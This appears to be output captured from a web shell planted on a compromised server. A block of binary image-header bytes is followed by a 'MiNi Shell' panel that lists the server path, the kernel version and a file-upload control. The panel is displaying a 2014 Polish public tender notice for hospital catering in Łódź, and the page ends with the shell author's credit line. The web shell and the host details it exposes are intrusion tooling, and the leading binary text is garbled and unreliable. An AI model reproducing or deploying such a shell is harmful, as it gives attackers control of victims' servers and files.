JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140902/291618-N-2014.html

<p class="kh_header"><b>Łódź: Świadczenie usług związanych z przygotowaniem całodziennego wyżywienia
 z uwzględnieniem diet i kaloryczności dla pacjentów Kliniki Chorób Zawodowych i Toksykologii IMP w Łodzi wraz z dzierżawą pomieszczeń i urządzeniami stanowiącymi wyposażenie kuchni</b><br>
<b>Numer ogłoszenia: 291618 - 2014; data zamieszczenia: 02.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy im. prof. dra med. Jerzego Nofera , ul. Św. Teresy od Dzieciątka Jezus 8, 91-348 Łódź, woj. łódzkie, tel. 42 6314533, faks 42 6314573.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług związanych z przygotowaniem całodziennego wyżywienia
 z uwzględnieniem diet i kaloryczności dla pacjentów Kliniki Chorób Zawodowych i Toksykologii IMP w Łodzi wraz z dzierżawą pomieszczeń i urządzeniami stanowiącymi wyposażenie kuchni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest: 
1.Przedmiotem  umowy  jest  świadczenie usług związanych z przygotowaniem całodziennego wyżywienia, z uwzględnieniem diet i kaloryczności,  dla pacjentów Kliniki Chorób Zawodowych i Toksykologii  IMP(Oddział Chorób Zawodowych i Oddział Toksykologii) wraz z dzierżawą pomieszczeń i urządzeniami stanowiącymi wyposażenie kuchni. Zakres świadczonych usług obejmuje przygotowanie następujących posiłków: śniadania, obiady, kolacje, diety wskazane przez Klinikę.
2.Codzienną  ilość posiłków  należy  ustalić z  Kliniką Chorób Zawodowych i Toksykologii IMP ;Oddział Chorób Zawodowych i Oddział Toksykologii;w oparciu o wystawiane codziennie druki (RELEWA).
3.Wykonawca będzie prowadził usługę żywienia z należytą starannością z uwzględnieniem zawodowego charakteru prowadzonej działalności, zgodnie z zasadami określonymi w przepisach dotyczących żywienia zbiorowego, w szczególności żywienia w szpitalach, w przepisach w o bezpieczeństwie żywienia i żywności, oraz w przepisach sanitarno-epidemiologicznych. Usługa żywienia musi być wykonywana przez Wykonawcę w okresie trwania Zamówienia przez 7 dni w tygodniu , w tym w dni ustawowo wolne od pracy, poczynając od daty rozpoczęcia świadczenia usługi żywienia.
4.Zamawiający przewiduje następujące średnie szacunkowe miesięczne zapotrzebowanie na posiłki:
Średnie miesięczne zapotrzebowanie na wyżywienie pacjentów Kliniki IMP
Śniadania 500
Obiady 500
Kolacje 500
Transport posiłków na oddział zapewnia Wykonawca.
5.Wykonawca ma obowiązek dostarczać posiłki codziennie do Kliniki do miejsca wskazanego przez 
Zamawiającego wg następującego harmonogramu:
Śniadania:7.30 - 8.30
Obiady:12.30-13.30                            
Kolacje: będą dostarczane do miejsca wskazanego przez Zamawiającego wraz z obiadem. Transport posiłków będzie odbywał się w naczyniach Zamawiającego (Zamawiający posiada naczynia, sztućce).
W soboty, niedziele i święta obiady  dla Kliniki wydawane  są  od  godz. 12.00  do 13.00  razem  z  kolacją.  
6.Ustala się  godziny  wydawania  posiłków  w  (Stołówce)(które w zależności od potrzeb Zamawiającego mogą ulec zmianie);(dotyczy oddzielnych zleceń).
Śniadania 7.30-8.30
Obiady 13.30-15.00                             
Kolacje 17.00- 18.00
7.Dostawy posiłków do wyznaczonego pomieszczenia, nie mogą odbywać się poza wskazanymi w    ust. 5 i 6  niniejszego paragrafu porami dostaw.
8.Wykonawca  jest  zobowiązany  zapewnić  odpowiedni  jadłospis, z uwzględnieniem różnorodnych diet, na które będzie zapotrzebowanie  w Klinice, uzgodniony  z  dietetykiem (własnym)  oraz  Zamawiającym jak również zapewnić  recepturę  posiłków  zgodnych  ze  sztuką  kulinarną (nie dotyczy suchego prowiantu, który będzie oddzielnie fakturowany).
Diety indywidualne i specjalistyczne przygotowywane będą według zaleceń lekarskich.
Diety realizowane będą zgodnie z zaleceniami lekarza prowadzącego, wydanymi po wizycie lekarskiej. Dane o rodzaju i ilości poszczególnych diet będą przekazywane pisemnie lub ustnie przez osoby upoważnione przez Zamawiającego.
Diety zgłaszane będą rano przy pobieraniu pierwszego posiłku, tj. śniadania lub 
w trakcie dnia po zaleceniu lekarza.
9.Posiłki nie mogą być zastępowane przemysłowymi posiłkami gotowymi. Zamawiający nie dopuszcza podawania posiłków nieświeżych, np. wyprodukowanych dzień wcześniej i poddanych regeneracji.
10.Jadłospis będzie składany do uzgodnienia pielęgniarce oddziałowej na dziesięć dni przed rozpoczęciem jego realizacji i będzie zawierał następujące informacje: wyszczególnienie potraw składających się na poszczególne posiłki, wyszczególnienie użytych produktów, ich wagę, wartości energetyczne i odżywcze. Każdorazowo  dla poszczególnych oddziałów kliniki wraz z posiłkami dostarczany będzie przez Wykonawcę aktualny wyciąg z jadłospisu, zawierający ilość porcji oraz wagę pojedynczej  porcji (ilość, objętość). Do wglądu w jadłospis upoważniony jest Kierownik Działu Administracyjno-Technicznego oraz upoważnieni przez niego pracownicy.
11.Wykonawca zapewni dostawę posiłków do Oddziału Toksykologii z podziałem na posiłki dla Oddziału Toksykologii i Chorób Zawodowych. 
12.Zamawiający  zastrzega  sobie  prawo  do  kontroli  sporządzanych  posiłków na każdym etapie ich produkcji pod  względem   ich  jakości  i  zgodności  z  obowiązującymi  normami  żywieniowymi. Do kontroli upoważniona jest Przełożona Pielęgniarek Kliniki lub osoba przez nią upoważniona oraz Kierownik Działu Administracyjno-Technicznego lub osoba przez niego upoważniona, 
13.Zamawiający wymaga również od Wykonawcy:
a)przestrzegania zaleceń Stacji Sanitarno-Epidemiologicznej, Instytutu Żywności i Żywienia w sprawie norm wyżywienia i żywienia, jakie obowiązują w zamkniętych zakładach żywienia zbiorowego oraz jakości zdrowotnej żywności,
b)utrzymania należytego reżimu higieniczno-sanitarnego i epidemiologicznego.  
14.Wykonawca zobowiązuje się wyznaczyć osobę odpowiedzialną za kontakt z Zamawiającym i nadzór nad realizacją usługi oraz zapewnić z nią stały kontakt telefoniczny. Zamawiający musi być pisemnie poinformowany przez Wykonawcę o zmianie osoby wyznaczonej do kontaktu w trakcie trwania umowy.
15.Wykonawca zobowiązany będzie również do codziennej produkcji i sprzedaży posiłków pracownikom IMP lub gościom oraz obsługi gości w ramach organizowanych przez IMP zjazdów, konferencji, szkoleń i spotkań naukowych, na podstawie oddzielnych zleceń. Średnia miesięczna liczba obiadów za lata 2012-2014 (z wyłączeniem okresu wakacyjnego) dla uczestników zjazdów, konferencji, szkoleń i spotkań naukowych wynosiła 350.
16.Zamawiający zastrzega, iż w trakcie obowiązywania niniejszej umowy mogą zaistnieć zmiany restrukturyzacyjne IMP, w związku z powyższym ilość wydawanych posiłków może ulec zmniejszeniu.
17.Zmniejszenie ilości wydawanych posiłków z powodu wymienionego w pkt. 16, jak również innych nie wymienionych przyczyn (w szczególności mniejszej liczby pacjentów ), nie spowoduje dla Zamawiającego żadnych konsekwencji prawno - finansowych.
18.Zamawiający dopuszcza możliwość przygotowywania w dzierżawionych pomieszczeniach posiłków dla innych podmiotów. Czynność ta jednak musi być poprzedzona negocjacjami pomiędzy Wykonawcą i Zamawiającym a Wykonawca musi otrzymać odpowiednie zezwolenie. Ze stołówki mogą korzystać wyłącznie osoby upoważnione (np. pracownicy Zamawiającego i Szpitala im. Biegańskiego, kursanci, uczestnicy zjazdów, konferencji, pracownicy firm serwisowych, budowlanych wykonujący prace w IMP, itp.) przez Zamawiającego. Po uzyskaniu zgody i ustaleniu terminu oraz warunków z Zamawiającym, Wykonawca będzie mógł wykorzystywać stołówkę dla swoich potrzeb np. organizacja wyżywienia okolicznościowego. Zamawiający ma pierwszeństwo w  wykorzystaniu pomieszczenia stołówki. Po zakończeniu korzystania ze stołówki strona z niej korzystająca będzie zobowiązana do doprowadzenia pomieszczenia stołówki do stanu pierwotnego. Wszelka dodatkowa działalność Wykonawcy nie może w żaden sposób zakłócać normalnej działalności Zamawiającego. 
II. W  ramach  prowadzenia  działalności  Wykonawca jest  odpowiedzialny  za: 
a)zakup  surowców  niezbędnych  do  przygotowania  posiłków, zapewnienie  odpowiedniej  kaloryczności i  jakości, zgodnie z  normami   w  żywieniu  szpitalnym  i  zbiorowym, Wszystkie produkty wykorzystywane do produkcji przez Wykonawcę muszą posiadać aktualną datę przydatności
do spożycia, a po jej upływie, Wykonawca nie może tych produktów używać do przygotowywania posiłków. Produkty takie jak miód, dżem oraz tłuszcz stosowany jako dodatek do pieczywa muszą być
pdawane w opakowaniach jednorazowych
b)obsługę konsumentów w porze obiadowej przy stolikach w sali jadalnej (lub innej uzgodnionej z Zamawiającym) (dotyczy oddzielnych zleceń), 
c)zapewnienie  ciągłości  w  dostarczaniu  posiłków, również podczas  przeprowadzanych  remontów  np. w czasie malowania,
d)zatrudnianie do realizacji zamówienia pracowników  posiadających aktualne książeczki do celów sanitarno-epidemiologicznych. Osoby wykonujące prace w procesie produkcji/wydawania posiłków muszą przestrzegać higieny osobistej, nosić właściwą, czystą odzież ochronną, oraz jeśli to niezbędne obuwie robocze,
e)codzienne utrzymanie porządku, czystości i higieny dzierżawionych pomieszczeń oraz mebli (część magazynowa, produkcyjna, sala jadalna i pozostałe pomieszczenia), z uwzględnieniem utrzymania w bieżącej czystości przeszklonych drzwi wejściowych do sali jadalnej (od podłogi do sufitu),
f)wykonywanie dwa razy  w roku, lub  w miarę potrzeby częściej, mycia okien i wymiany firanek,
g)przestrzeganie aktualnych przepisów BHP, ppoż. oraz higieniczno-sanitarnych i epidemiologicznych, jak również stosowanie się do zaleceń służb IMP w tym zakresie,
h)ubezpieczanie się  z tytułu wykonywanej działalności obejmującą odpowiedzialność za szkody z tytułu zdarzeń losowych oraz zatruć zbiorowych. Z chwilą zawarcia umowy Wykonawca przedłoży do wglądu aktualną polisę ubezpieczeniową,
i)bezwzględne włączanie urządzeń wentylacyjnych kuchni i stołówki.
j)Wykonawca zobowiązany jest do przechowywania przez okres 72 godzin w oddzielnej lodówce próbek pokarmowych ze wszystkich dostarczonych każdego dnia posiłków, z oznaczeniem daty i godziny pobrania próbki pokarmowej, opatrzonej podpisem osoby odpowiedzialnej za pobranie próbki
III.Działalność o której mowa w pkt. I i II będzie  prowadzona  w  pomieszczeniach   o powierzchni  użytkowej  kuchni i magazynów 196,29 m2, położonych  w  pomieszczeniach  budynku A stanowiących  własność  Instytutu  Medycyny  Pracy  w  Łodzi  przy  ul.  Św. Teresy od Dzieciątka Jezus 8 .
1.Zamawiający oddaje Wykonawcy opisane w pkt. I i II  pomieszczenia do użytkowania z przeznaczeniem na usługi w zakresie zbiorowego żywienia.
2.Wykonawca zobowiązany jest do używania przedmiotu najmu zgodnie z jego przeznaczeniem.
3.Przedmiot najmu nie może być bez zgody Zamawiającego przedmiotem użyczenia ani oddany w podnajem
4.Za używanie pomieszczeń Wykonawca zobowiązuje się płacić Zamawiającemu czynsz miesięczny  w wysokości 2 439,02 zł netto (słownie: dwa tysiące czterysta trzydzieści dziewięć złotych 02/00 netto) + podatek VAT 23 %.
5.Wykonawca  zobowiązuje  się  pokrywać   koszty  energii  elektrycznej, wody i gazu, za  faktyczne  zużycie , zgodnie  ze  wskazaniem  liczników. Rachunek  za faktyczne  zużycie  energii  elektrycznej,  wody  i  gazu  wystawia Zamawiający  w terminie  10 dni  od daty  otrzymania  faktur od  dostawcy  mediów.
6.Zamawiający przewiduje waloryzację stawek opłat używanych mediów według bieżących cen obowiązujących u dostawców .
7.W IMP obowiązuje selektywna zbiórka odpadów. Wykonawca obowiązany jest stosować się do Instrukcji prawidłowego gospodarowania odpadami w IMP Zarządzenie Wewnętrzne Dyrektora IMP. W przypadku konieczności zainstalowania dodatkowego kontenera;kontenerów na wyłączne potrzeby kuchni do jego;ich zainstalowania i opłat z nim;nimi związanych zobligowany będzie Wykonawca.
8.Zamawiający zastrzega sobie prawo podwyższenia stawki czynszu w przypadku zwiększenia przez Wykonawcę ilości odbioru odpadów poprodukcyjnych bądź też w przypadku wzrostu stawek opłat za wywóz odpadów  bez potrzeby zmiany umowy.
9.W przypadku zaistnienia potrzeby dodatkowego opróżnienia tłuszczownika, Zamawiający kosztami za ww. usługę obciąży Wykonawcę na zasadzie refakturowania usługi.
10.Wykonawcy przysługuje bezpłatny telefon stacjonarny do rozmów wewnętrznych na terenie IMP. Za rozmowy zewnętrzne (poza terenem IMP) Wykonawca zobowiązuje się pokrywać koszty rozmów telefonicznych zgodnie z wydrukami z Centrali IMP. Na życzenie Wykonawcy istnieje możliwość blokady połączeń zewnętrznych.
Szczegółowe warunki najmu lokalu znajdują się w załączniku nr 6 -wzór umowy par.4.
Wykonawcom zaleca się odbycie wizji lokalnej w pomieszczeniach przeznaczonych na funkcjonowanie kuchni w celu zdobycia wszelkich informacji niezbędnych do  przygotowania oferty. Termin należy ustalić z pracownikami Zamawiającego wskazanymi w SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.89.42.20-9, 55.32.20.00-3, 55.32.10.00-6, 55.51.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy z art. 22 ust. 1 - Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy z art. 22 ust. 1 - Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy z art. 22 ust. 1 - Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy z art. 22 ust. 1 - Załącznik nr 3 do SIWZ
W zakresie dysponowania osobami zdolnymi do wykonania zamówienia:
wykaz osób które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych,  doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Osoby muszą  posiadać przygotowanie zawodowe do prowadzenia stołówki w zakresie żywienia  szpitalnego i zbiorowego oraz posiadać aktualne książeczki zdrowia. (Załącznik nr 4).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy z art. 22 ust. 1 - Załącznik nr 3 do SIWZ
Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie   prowadzonej działalności związanej z przedmiotem zamówienia, obejmującej odpowiedzialność za szkody z tytułu zdarzeń losowych oraz zatruć zbiorowych na kwotę min. 100.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca zobowiązany jest dołączyć do oferty:
4.1 Wypełnione załączniki do SIWZ.
4.2 Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zawarte we wzorze umowy załącznik nr 6</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imp.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Medycyny Pracy w Łodzi, ul. Św. Teresy od Dzieciątka Jezus Nr 8 w pokoju 384 - Sekcja Zamówień Publicznych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2014 godzina 10:00, miejsce: Instytut Medycyny Pracy w Łodzi, ul. Św. Teresy od Dzieciątka Jezus Nr 8 w pokoju 81 - Kancelaria Główna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com